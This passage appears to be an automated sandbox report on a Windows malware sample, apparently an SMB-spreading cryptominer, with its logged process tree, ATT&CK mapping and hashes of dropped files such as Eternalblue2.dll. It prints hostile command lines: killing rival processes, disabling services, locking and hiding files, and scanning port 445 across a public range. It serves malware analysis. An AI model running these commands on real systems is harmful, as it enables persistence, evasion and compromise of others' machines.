      taskkill /f /im GoogleCdoeUpdate.exe
      4⤵
      Kills process with taskkill
      PID:1664
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im TrustedHostex.exe
      4⤵
      Kills process with taskkill
      PID:2024
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im svhost.exe
      4⤵
      Kills process with taskkill
      PID:2368
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im WUDFHosts.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1604
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im scvhost.exe
      4⤵
      Kills process with taskkill
      PID:1696
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im csrse.exe
      4⤵
      Kills process with taskkill
      PID:2900
  - - C:\Windows\SysWOW64\net.exe
      net stop "mssecsvc2.0"
      4⤵
      PID:2904
  - - C:\Windows\SysWOW64\sc.exe
      sc stop "dbuxbr"
      4⤵
      Launches sc.exe
      PID:2592
  - - C:\Windows\SysWOW64\sc.exe
      sc stop "mssecsvc2.1"
      4⤵
      Launches sc.exe
      PID:2660
  - - C:\Windows\SysWOW64\sc.exe
      sc config "dbuxbr" start= disabled
      4⤵
      Launches sc.exe
      PID:1924
  - - C:\Windows\SysWOW64\sc.exe
      sc config "lbpuamoqhpoqju171" start= disabled
      4⤵
      Launches sc.exe
      PID:2280
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im mssecsvr.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2724
  - - C:\Windows\SysWOW64\sc.exe
      sc config "mssecsvc2.0" start= disabled
      4⤵
      Launches sc.exe
      PID:1688
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im mssecsvc.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1544
  - - C:\Windows\SysWOW64\sc.exe
      sc config "mssecsvc2.1" start= disabled
      4⤵
      Launches sc.exe
      PID:1072
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im tasksche.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3008
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      Wmic Process Where "Name='svchost.exe' And ExecutablePath='C:\\Windows\\Fonts\\Microsoft\\svchost.exe'" Call Terminate
      4⤵
      Kills process with WMI
      Suspicious use of AdjustPrivilegeToken
      PID:3068
  - - C:\Windows\SysWOW64\sc.exe
      sc config "fastuserswitchingcompatibility" start= disabled
      4⤵
      Drops file in Windows directory
      Launches sc.exe
      Suspicious use of WriteProcessMemory
      PID:2688
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      Wmic Process Where "Name='taskhost.exe' And ExecutablePath='C:\\Windows\\Fonts\\Microsoft\\taskhost.exe'" Call Terminate
      4⤵
      Executes dropped EXE
      Kills process with WMI
      PID:2820
  - - C:\Windows\SysWOW64\sc.exe
      sc config "tjuldl" start= disabled
      4⤵
      Launches sc.exe
      PID:2296
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      Wmic Process Where "Name='mssecsvr.exe' And ExecutablePath='C:\\Windows\\mssecsvr.exe'" Call Terminate
      4⤵
      Executes dropped EXE
      Kills process with WMI
      PID:2568
  - - C:\Windows\SysWOW64\sc.exe
      sc stop "lbpuamoqhpoqju171"
      4⤵
      Launches sc.exe
      PID:2716
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      Wmic Process Where "Name='tasksche.exe' And ExecutablePath='C:\\Windows\\tasksche.exe'" Call Terminate
      4⤵
      Kills process with WMI
      PID:2472
  - - C:\Windows\SysWOW64\sc.exe
      sc stop "mssecsvc2.0"
      4⤵
      Launches sc.exe
      PID:1912
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      Wmic Process Where "Name='mssecsvc.exe' And ExecutablePath='C:\\WINDOWS\\mssecsvc.exe'" Call Terminate
      4⤵
      Kills process with WMI
      PID:2148
  - - C:\Windows\SysWOW64\sc.exe
      sc stop "fastuserswitchingcompatibility"
      4⤵
      Launches sc.exe
      PID:2864
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      Wmic Process Where "Name='tasksche.exe' And ExecutablePath='C:\\Windows\\tasksche.exe'" Call Terminate
      4⤵
      Kills process with WMI
      PID:2224
  - - C:\Windows\SysWOW64\sc.exe
      sc stop "tjuldl"
      4⤵
      Launches sc.exe
      PID:2636
  - - C:\Windows\SysWOW64\net.exe
      net stop "lbpuamoqhpoqju171"
      4⤵
      PID:2752
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      Wmic Process Where "Name='mssecsvr.exe' And ExecutablePath='C:\\WINDOWS\\mssecsvr.exe'" Call Terminate
      4⤵
      Kills process with WMI
      PID:2928
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      Wmic Process Where "Name='mssecsvc.exe' And ExecutablePath='C:\\WINDOWS\\mssecsvc.exe'" Call Terminate
      4⤵
      Kills process with WMI
      Suspicious use of AdjustPrivilegeToken
      PID:268
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\mssecsvr.exe /p system:n
      4⤵
      PID:1456
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\tasksche.exe /p system:n
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1976
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im conhosts.exe
      4⤵
      Kills process with taskkill
      PID:1480
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im lsmose.exe
      4⤵
      Kills process with taskkill
      PID:2120
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im lsmosee.exe
      4⤵
      Kills process with taskkill
      PID:1528
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      Wmic Process Where "Name='conhosts.exe' And ExecutablePath='C:\\Windows\\Temp\\conhosts.exe'" Call Terminate
      4⤵
      Kills process with WMI
      PID:2076
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\qeriuwjhrf /p system:n
      4⤵
      PID:456
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:1768
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      Wmic Process Where "Name='conhost.exe' And ExecutablePath='C:\\Windows\\Temp\\conhost.exe'" Call Terminate
      4⤵
      Kills process with WMI
      Suspicious use of AdjustPrivilegeToken
      PID:2324
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:796
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      Wmic Process Where "Name='lsmosee.exe' And ExecutablePath='C:\\Windows\\help\\lsmosee.exe'" Call Terminate
      4⤵
      Kills process with WMI
      Suspicious use of AdjustPrivilegeToken
      PID:580
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      Wmic Process Where "Name='lsmose.exe' And ExecutablePath='C:\\Windows\\help\\lsmose.exe'" Call Terminate
      4⤵
      Kills process with WMI
      PID:2360
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\mssecsvc.exe /p system:n
      4⤵
      PID:1940
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      Wmic Process Where "Name='lsmosee.exe' And ExecutablePath='C:\\Windows\\debug\\lsmosee.exe'" Call Terminate
      4⤵
      Kills process with WMI
      Suspicious use of AdjustPrivilegeToken
      PID:2500
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      Wmic Process Where "Name='lsmose.exe' And ExecutablePath='C:\\Windows\\debug\\lsmose.exe'" Call Terminate
      4⤵
      Kills process with WMI
      Suspicious use of AdjustPrivilegeToken
      PID:2480
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      Wmic Process Where "Name='conime.exe' And ExecutablePath='C:\\Progra~1\\Common~1\\conime.exe'" Call Terminate
      4⤵
      Kills process with WMI
      PID:1992
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1412
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:1468
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +s +h +r C:\WINDOWS\Web\*.vbs
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:2556
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +s +h +r C:\Windows\Temp\conhost.exe
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:900
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\help\lsmosee.exe /p system:n
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1988
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\help\lsmose.exe /p system:n
      4⤵
      PID:2164
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2452
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\debug\lsmose.exe /p system:n
      4⤵
      PID:1744
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:1228
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\Temp\*.exe /p system:n
      4⤵
      PID:2116
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\debug\xmrstak_opencl_backend.dll /p system:n
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2024
  - - C:\Windows\SysWOW64\attrib.exe
      attrib -r -h -s C:\Documents and Settings\All Users\Application Data\clr_optimization_v4.0.30318_64
      4⤵
      Views/modifies file attributes
      PID:2676
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\ProgramData\clr_optimization_v4.0.30318_64\svchost.exe /c /e /t /g system:F
      4⤵
      PID:1616
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2436
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\ProgramData\Microsoft\clr_optimization_v4.0.30318_64\csrss.exe /c /e /t /g system:F
      4⤵
      PID:2268
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:1696
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2616
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:1532
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\ProgramData\Microsoft\clr_optimization_v4.0.30318_64 /c /e /t /g everyone:F
      4⤵
      PID:2596
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2748
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Documents and Settings\All Users\Application Data\clr_optimization_v4.0.30318_64 /c /e /t /g system:F
      4⤵
      PID:2864
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2600
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Documents and Settings\All Users\Application Data\clr_optimization_v4.0.30318_64 /c /e /t /g everyone:F
      4⤵
      PID:2656
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2612
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\ProgramData\Microsoft\clr_optimization_v4.0.30318_64 /c /e /t /g system:F
      4⤵
      PID:2904
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "mssecsvc2.0"
        5⤵
        
        PID:1532
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\ProgramData\clr_optimization_v4.0.30318_64 /c /e /t /g everyone:F
      4⤵
      PID:1268
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:1624
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\ProgramData\clr_optimization_v4.0.30318_64 /c /e /t /g system:F
      4⤵
      PID:2892
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "mssecsvc2.1"
        5⤵
        
        PID:2616
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\ProgramData\Microsoft\clr_optimization_v4.0.30318_64\csrss.exe /c /e /t /g everyone:F
      4⤵
      PID:2900
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2736
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Documents and Settings\All Users\Application Data\clr_optimization_v4.0.30318_64\svchost.exe /c /e /t /g system:F
      4⤵
      PID:2704
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2660
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Documents and Settings\All Users\Application Data\clr_optimization_v4.0.30318_64\svchost.exe /c /e /t /g everyone:F
      4⤵
      PID:2588
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2276
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\Fonts\Mysql\same.bat /p system:n
      4⤵
      PID:2608
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:3064
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\ProgramData\clr_optimization_v4.0.30318_64\svchost.exe /c /e /t /g everyone:F
      4⤵
      PID:2252
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2840
  - - C:\Windows\SysWOW64\attrib.exe
      attrib -r -h -s C:\Documents and Settings\All Users\Application Data\clr_optimization_v4.0.30318_64\svchost.exe
      4⤵
      Views/modifies file attributes
      PID:1612
  - - C:\Windows\SysWOW64\attrib.exe
      attrib -r -h -s C:\ProgramData\clr_optimization_v4.0.30318_64\svchost.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Views/modifies file attributes
      PID:2368
  - - C:\Windows\SysWOW64\attrib.exe
      attrib -r -h -s C:\ProgramData\clr_optimization_v4.0.30318_64
      4⤵
      Views/modifies file attributes
      PID:2308
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:624
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\debug\xmrstak_cuda_backend.dll /p system:n
      4⤵
      PID:2348
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1664
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\WINDOWS\Debug\item.dat /p system:n
      4⤵
      PID:2100
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2524
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\WINDOWS\Web\*.vbs /p system:n
      4⤵
      PID:2388
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:1560
  - - C:\Windows\SysWOW64\cacls.exe
      cacls c:\windows\web\*.bat /p system:n
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2312
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:836
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\Temp\conhost.exe /p system:n
      4⤵
      PID:880
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:556
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2456
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Progra~1\Common~1\conime.exe /p system:n
      4⤵
      PID:816
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2448
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\debug\lsmosee.exe /p system:n
      4⤵
      PID:2668
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2052
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:884
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +s +h +r C:\Windows\help\lsmose.exe
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:908
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +s +h +r C:\WINDOWS\Debug\item.dat
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:1404
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +s +h +r c:\windows\web\*.bat
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:2004
  - - C:\Windows\SysWOW64\net.exe
      net stop "mssecsvc2.1"
      4⤵
      PID:2892
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\System32\Tasks\WwANsvc /p system:n
      4⤵
      PID:2800
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\System32\Tasks\HomeGroupProvider /p system:n
      4⤵
      PID:2744
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:1532
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\System32\Tasks\MiscfostNsi /p system:n
      4⤵
      PID:2132
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\Tasks\*my* /p system:n
      4⤵
      PID:2708
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2736
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\Tasks\*ok* /p system:n
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2900
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2404
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\Tasks\*sa* /p system:n
      4⤵
      PID:2252
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1696
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\Tasks\*Group* /p system:n
      4⤵
      PID:1580
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2436
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\Tasks\WwANsvc /p system:n
      4⤵
      PID:2160
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:1920
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2508
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\Tasks\MiscfostNsi /p system:n
      4⤵
      PID:844
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:1112
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:1752
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\System32\Tasks\At1 /c /e /t /g everyone:F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1156
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:1560
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\System32\Tasks\At2 /c /e /t /g system:F
      4⤵
      PID:1200
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:836
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\System32\Tasks\At1 /c /e /t /g system:F
      4⤵
      PID:2220
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:1744
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\windows\tasks\At1.job /c /e /t /g everyone:F
      4⤵
      PID:2512
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3056
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\windows\tasks\At2.job /c /e /t /g system:F
      4⤵
      PID:1700
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\windows\tasks\At1.job /c /e /t /g system:F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1952
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:896
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +h +s -r C:\windows\tasks\At*.job
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Views/modifies file attributes
      PID:1224
- C:\Users\Admin\AppData\Local\Temp\xsfxdel~.exe
  "C:\Users\Admin\AppData\Local\Temp\xsfxdel~.exe" "C:\Users\Admin\AppData\Local\Temp\44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe"
  2⤵
  - Deletes itself
  - Executes dropped EXE
  PID:2564

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "MicrosoftMssql"
1⤵
PID:3008

C:\Windows\Fonts\Mysql\svchost.exe
C:\Windows\Fonts\Mysql\svchost.exe
1⤵
- Executes dropped EXE
PID:2980
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Windows\Fonts\Mysql\cmd.bat" "
  2⤵
  - Loads dropped DLL
  PID:1380
- - C:\Windows\SysWOW64\sc.exe
    sc config Browser start= auto
    3⤵
    - Launches sc.exe
    PID:456
- - C:\Windows\SysWOW64\sc.exe
    sc config lanmanworkstation start= auto
    3⤵
    - Launches sc.exe
    PID:852
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    PID:1480
- - C:\Windows\SysWOW64\net.exe
    net start lanmanworkstation
    3⤵
    PID:1692
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start lanmanworkstation
      4⤵
      PID:1516
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mance.exe
    3⤵
    - Kills process with taskkill
    PID:2324
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    PID:1444
- - C:\Windows\SysWOW64\net.exe
    net start lanmanserver
    3⤵
    PID:1276
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im Eter.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:656
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im puls.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1820
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mance.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1660
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im Eter.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2412
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mance.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2476
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im puls.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1880
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im puls.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1556
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.1 -n 5
    3⤵
    - Runs ping.exe
    PID:1260
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.1 -n 3
    3⤵
    - Runs ping.exe
    PID:2292
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.1 -n 3
    3⤵
    - Runs ping.exe
    PID:1496
- - C:\Windows\Fonts\Mysql\taskhost.exe
    taskhost.exe tcp 89.149.0.254 89.149.255.254 445 450 /save
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    PID:2712
- - C:\Windows\Fonts\Mysql\wget.exe
    wget -O temp.txt "http://v4.ipv6-test.com/api/myip.php"
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    PID:2768
- - C:\Windows\SysWOW64\net.exe
    net start Browser
    3⤵
    PID:1776
- - C:\Windows\SysWOW64\sc.exe
    sc config lanmanserver start= auto
    3⤵
    - Launches sc.exe
    PID:240

C:\Windows\SysWOW64\mode.com
mode con cols=50 lines=40
1⤵
PID:796

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start lanmanserver
1⤵
PID:1748

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SharedAccess
1⤵
PID:1528

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start Browser
1⤵
PID:1428

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start "MicrosoftMysql"
1⤵
PID:2008

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start Schedule
1⤵
PID:2712

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "lbpuamoqhpoqju171"
1⤵
PID:2696

C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
1⤵
PID:1112

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Credential Access

Discovery

Network Service Discovery

T1046

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\Fonts\Mysql\Doublepulsar2.dll

Filesize
84KB

MD5
a1dcc5c46acec31002c3273d84e9c990

SHA1
1d998a6dc7a27f13359008d51b4e5d5f155b281c

SHA256
c8fee8d909b05f808257171dd83d310deebb97bf8a495ef8d3791e6ac61bba4c

SHA512
c636311dd4c47fa35856eaa32ffe1f942c8162880e21e297220a4704ddd40445a367b780e5cbea04569100bd719149207f343a86936fe5a6061b940e9dd0dd85

Download Submit
C:\Windows\Fonts\Mysql\Eternalblue2.dll

Filesize
69KB

MD5
e50a77d7def8dd3008541c5cb5378ff8

SHA1
c548ae83bf7258371d20576483dfc40d5c5b5ba2

SHA256
958e1435f2c1665ca53231454cf8fbc9a4d75426bae3e12c51bdf33d495e3e0c

SHA512
6890ed62eaf1282feee837b6194ae937dbc2df8bbb5fa3775f1d337ca6cf6de41b5e390af488125cc334acfd3d4c85f61265294ad7ecffd9bbdb4614ff5a98ed

Download Submit
C:\Windows\Fonts\Mysql\cmd.bat

Filesize
25KB

MD5
66b66dc0eb2437b233a8256b9a02902f

SHA1
0f8664e738f52053e5b4f07812b76647bde52c9a

SHA256
241328fd46d6ddea11cb6ed2514a950a083e623fbdd9a02602a5696e8b6b6a0e

SHA512
adffc967593f7632462ee458878354f8348951677295678222f9a7a86ac3ffd333d364cea1f87c2fa26860b6208d49b66a96ec23f662474d3e43fc5a5977e4be

Download Submit
C:\Windows\Fonts\Mysql\ctfmon.exe

Filesize
200KB

MD5
dde7a62c6e9f858f3dbe472ca9f9b693

SHA1
31959bce7a18628d7d9d1a06514b192196a87884

SHA256
4424f327aec6719f7f55dea92f9501644ad72babd4dee0f2fa817f18ab3bfc5b

SHA512
3adf8525ffb8bd443cead79b238121d678732aec2a4642671289bac6a71037c93302fc6c877ab5e8a5f041e8d0c367fa696de78642d1a55435d790a45fe0bfd8

Download Submit
C:\Windows\Fonts\Mysql\ctfmon.exe

Filesize
403KB

MD5
fac0181db3df4f89c0ce42e3b0db83bb

SHA1
ce15828e24d07bed6f3ec40f47eb080408ce898e

SHA256
542585c37a688d49f62d5d8e31f461bca2132de7ca9fb7610c59588edc20dc4a

SHA512
7060a3bd156a01a88c9982999fdd5fa6aabea675d66dd1c00485752029315f05730d30809de5696c142ceea5c47d829cc4cc575b5b23105c337f15645035f9d0

Download Submit
C:\Windows\Fonts\Mysql\same.bat

Filesize
11KB

MD5
07986ecd5f759e85db37302bd0493ea4

SHA1
aec5bfe87cf052ca8dd4c909e5a35ff670c08edb

SHA256
6b891a659b3a17c238918533f704c9d47f6e2f958f94a23cace19c6922cb4829

SHA512
